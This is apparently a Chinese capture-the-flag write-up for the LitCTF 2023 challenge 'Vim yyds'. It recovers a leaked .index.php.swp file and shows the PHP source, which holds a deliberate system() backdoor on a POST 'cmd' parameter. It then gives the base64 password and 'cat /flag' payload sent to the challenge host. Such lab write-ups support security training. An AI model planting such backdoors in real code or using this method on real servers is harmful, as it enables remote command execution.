Problem: [LitCTF 2023]Vim yyds
[[toc]]
思路&EXP
-
dirsearch扫描
-
vim -r .index.php.swp
<body>
<main>
<div class="vim">
<img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
<h1 class="vim_yyds">
Vim yyds
</h1>
</div>
<h3 class="vim_said">
队里师傅说Vim是世界上最好的编辑器,不接受反驳
</h3>
<div class="can_can_vim">
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
echo "<p>Oh You got my password!</p>";
eval(system($_POST['cmd']));
}
?>
</div>
</main>
</body>
给了password的值Give_Me_Your_Flag
要求POST请求的参数password输出的值和Give_Me_Your_Flag的base64编码的值相同,然后就可以执行cmd的命令,即执行一句话木马
- HackBar
http://node4.anna.nssctf.cn:28015/
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd= cat /flag